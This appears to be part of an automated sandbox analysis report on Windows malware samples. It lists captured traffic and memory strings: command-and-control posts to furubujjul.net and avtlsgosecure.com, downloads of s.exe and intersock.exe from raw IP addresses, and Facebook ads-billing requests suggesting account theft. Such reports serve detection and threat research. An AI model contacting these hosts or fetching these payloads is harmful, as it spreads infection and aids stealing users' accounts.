Source: global traffic HTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jxgxe.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 246Host: furubujjul.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://erlmaqaee.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 355Host: furubujjul.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hbcgxocfi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 121Host: furubujjul.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qbaff.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 316Host: furubujjul.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qjfwyiswqf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 174Host: furubujjul.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uywhkxoed.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 264Host: furubujjul.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://osqxrahfo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 335Host: furubujjul.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ekwvv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 283Host: furubujjul.net
Source: global traffic HTTP traffic detected: GET /s.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.138.74.52
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gqesn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 146Host: furubujjul.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kmbcjpnhmn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 173Host: furubujjul.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vfnfj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 132Host: furubujjul.net
Source: global traffic HTTP traffic detected: GET /intersock.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 179.43.163.115
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ikrffkiyo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 359Host: furubujjul.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cluvur.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 298Host: furubujjul.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ogumtw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 231Host: furubujjul.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://penvasmsfn.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 317Host: furubujjul.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yupxpeh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 279Host: furubujjul.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://elepmy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 367Host: furubujjul.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://musgiffp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 327Host: furubujjul.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mosxiihyx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 194Host: furubujjul.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://erwwlrd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 127Host: furubujjul.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rplmdlqvb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 121Host: furubujjul.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uxbnplb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 347Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ttkphlkd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 276Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://acwsosy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 158Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hhnjmhndyi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 331Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mumrxhscl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 348Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sbclkddt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 225Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gwduafudxk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 282Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oluukivxak.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 278Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://urtpdj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 163Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qcouemgwhe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 151Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iveusnelmb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 176Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://feguaryku.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 245Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xaxubvgaxp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 277Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hgtoajitw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 131Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qatdmt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 157Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://taycucfic.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 211Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yflhmtrc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sqpwbiet.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 327Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ecyhmxgsfc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 265Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mnbmwy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 210Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ouoadwsue.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 359Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://meodpejlxy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 212Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://otrdotvq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 362Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://thytbewb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 346Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cgrdihsvb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 204Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nubtbm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 340Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tsfbujs.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 140Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ohjxgaebo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 133Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oqngiychus.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 223Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xmxbixt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 219Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rrmxi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 180Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ymvtebx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 180Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sxbykepfr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 165Host: avtlsgosecure.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pkuitvuub.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 290Host: avtlsgosecure.com
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 172.67.203.213 172.67.203.213
Source: Joe Sandbox View IP Address: 172.67.203.213 172.67.203.213
Source: 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://aaa.apiaaaeg.com/
Source: 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://aaa.apiaaaeg.com/P
Source: 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://aaa.apiaaaeg.com/Q
Source: 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://aaa.apiaaaeg.com/T
Source: 2A57.exe, 00000008.00000002.646563677.000000000083A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://aaa.apiaaaeg.com/V
Source: 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://aaa.apiaaaeg.com/check/?sid=203601&key=208a26f120e37e37bd82b4530154a948
Source: 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://aaa.apiaaaeg.com/check/?sid=203601&key=208a26f120e37e37bd82b4530154a948SE
Source: 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://aaa.apiaaaeg.com/check/?sid=203601&key=208a26f120e37e37bd82b4530154a948lE
Source: 2A57.exe, 00000008.00000002.617149584.0000000000562000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://aaa.apiaaaeg.com/check/safe
Source: 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://aaa.apiaaaeg.com/check/safeaaeg.comu
Source: 2A57.exe, 00000008.00000002.617149584.0000000000562000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://aaa.apiaaaeg.com/check/safeeR
Source: 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://aaa.apiaaaeg.com/check/safewQ
Source: 2A57.exe, 00000008.00000002.646563677.000000000083A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://aaa.apiaaaeg.com/f
Source: 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://aaa.apiaaaeg.com:80/check/?sid=203601&key=208a26f120e37e37bd82b4530154a948bHU8
Source: 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://aaa.apiaaaeg.com:80/check/safe
Source: 2A57.exe, 00000008.00000002.651334498.00000001400E2000.00000002.00000001.01000000.0000000A.sdmp, EAA.exe, 0000000C.00000002.651496776.00000001400E2000.00000002.00000001.01000000.0000000D.sdmp String found in binary or memory: http://aaa.aptpokmmooootmtmymuok.com/w.facebohttps://wwcebfSTPOGET/device-based/logination/x-www-for
Source: EAA.exe, 0000000C.00000003.557836455.0000000002483000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://avtlsgosecure.c24
Source: 2A57.exe, 00000008.00000002.604279074.00000000004FC000.00000004.00000020.00020000.00000000.sdmp, ECFD.exe, 00000009.00000002.636219136.000000000074B000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.603293768.000000000057C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 0000000F.00000000.503967031.0000000000C30000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000000F.00000002.521532194.0000000000E20000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://furubujjul.net/
Source: explorer.exe, 0000000F.00000000.503967031.0000000000C30000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000000F.00000002.521532194.0000000000E20000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://furubujjul.net/Mozilla/5.0
Source: ECFD.exe, 00000009.00000000.567462194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, ECFD.exe, 00000009.00000002.598151437.0000000000400000.00000040.00000400.00020000.00000000.sdmp, ECFD.exe, 00000009.00000000.556782273.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
Source: explorer.exe, 00000001.00000000.359830195.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.347268530.000000000ED27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.388576135.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.317714700.000000000091F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: ECFD.exe, 00000009.00000000.556782273.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://www.openssl.org/support/faq.html
Source: ECFD.exe, 00000009.00000002.615541092.000000000071A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/
Source: ECFD.exe, 00000009.00000002.608052687.00000000006D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.json
Source: ECFD.exe, 00000009.00000002.608052687.00000000006D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.json)d
Source: ECFD.exe, 00000009.00000002.608052687.00000000006D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.json5d
Source: ECFD.exe, 00000009.00000002.608052687.00000000006D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.jsons
Source: 2A57.exe, 00000008.00000003.557979104.000000000055D000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://messenger.com/
Source: 2A57.exe, 00000008.00000003.564547918.0000000000557000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.569618509.000000000085E000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.557979104.000000000055D000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.636071291.0000000000652000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/y0/l/0
Source: 2A57.exe, 00000008.00000003.564547918.0000000000557000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.557979104.000000000055D000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.636071291.0000000000652000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/y5/l/0
Source: 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yC/r/jQFlt4gyp9R.js?_nc_x=Ij3Wp8lg5Kz
Source: 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yH/l/0
Source: 2A57.exe, 00000008.00000002.645502477.0000000000824000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.647535642.0000000002446000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yH/r/xXDOO3oMCfl.js?_nc_x=Ij3Wp8lg5Kz
Source: 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yL/l/0
Source: 2A57.exe, 00000008.00000002.645502477.0000000000824000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.647535642.0000000002446000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yO/r/pslzeMSEB_a.js?_nc_x=Ij3Wp8lg5Kz
Source: 2A57.exe, 00000008.00000003.564547918.0000000000557000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.557979104.000000000055D000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.636071291.0000000000652000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yS/r/V_wJ8EQu-vo.js?_nc_x=Ij3Wp8lg5Kz
Source: 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yS/r/nHDYRDL5JAA.js?_nc_x=Ij3Wp8lg5Kz
Source: 2A57.exe, 00000008.00000003.564547918.0000000000557000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.569618509.000000000085E000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.568149257.000000000082D000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000003.557979104.000000000055D000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.636071291.0000000000652000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.xx.fbcdn.net/rsrc.php/v3/yV/l/0
